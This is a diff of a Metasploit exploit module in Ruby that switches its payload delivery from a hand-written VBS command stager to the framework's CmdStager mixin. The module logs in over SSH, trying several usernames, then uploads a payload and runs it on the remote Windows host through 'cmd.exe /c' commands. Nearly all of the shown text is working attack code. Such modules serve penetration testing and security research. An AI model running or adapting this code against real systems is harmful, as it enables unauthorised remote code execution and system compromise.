@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
99 Rank = ExcellentRanking
1010
1111 include Msf ::Exploit ::Remote ::Tcp
12- include Msf ::Exploit ::EXE
12+ include Msf ::Exploit ::CmdStager
1313
1414 def initialize ( info = { } )
1515 super ( update_info ( info ,
@@ -80,24 +80,8 @@ def check
8080 end
8181
8282
83- def upload_payload ( connection )
84- exe = generate_payload_exe
85- filename = rand_text_alpha ( 8 ) + ".exe"
86- cmdstager = Rex ::Exploitation ::CmdStagerVBS . new ( exe )
87- opts = {
88- :linemax => 1700 ,
89- :decoder => File . join ( Msf ::Config . data_directory , "exploits" , "cmdstager" , "vbs_b64" ) ,
90- }
91-
92- cmds = cmdstager . generate ( opts )
93-
94- if ( cmds . nil? or cmds . length < 1 )
95- print_error ( "The command stager could not be generated" )
96- raise ArgumentError
97- end
98- cmds . each { |cmd |
99- connection . exec! ( "cmd.exe /c " +cmd )
100- }
83+ def execute_command ( cmd , opts = { } )
84+ @connection . exec! ( "cmd.exe /c " +cmd )
10185 end
10286
10387 def setup_ssh_options
@@ -167,18 +151,17 @@ def exploit
167151
168152 options = setup_ssh_options
169153
170- connection = nil
154+ @ connection= nil
171155
172156 each_user do |username |
173157 next if username . empty?
174- connection = do_login ( username , options )
175- break if connection
158+ @ connection= do_login ( username , options )
159+ break if @ connection
176160 end
177161
178- if connection
162+ if @ connection
179163 print_status ( "Uploading payload, this may take several minutes..." )
180- upload_payload ( connection )
181- handler
164+ execute_cmdstager ( flavor : :vbs , decoder : default_decoder ( :vbs ) , linemax : 1700 )
182165 end
183166 end
184167
0 commit comments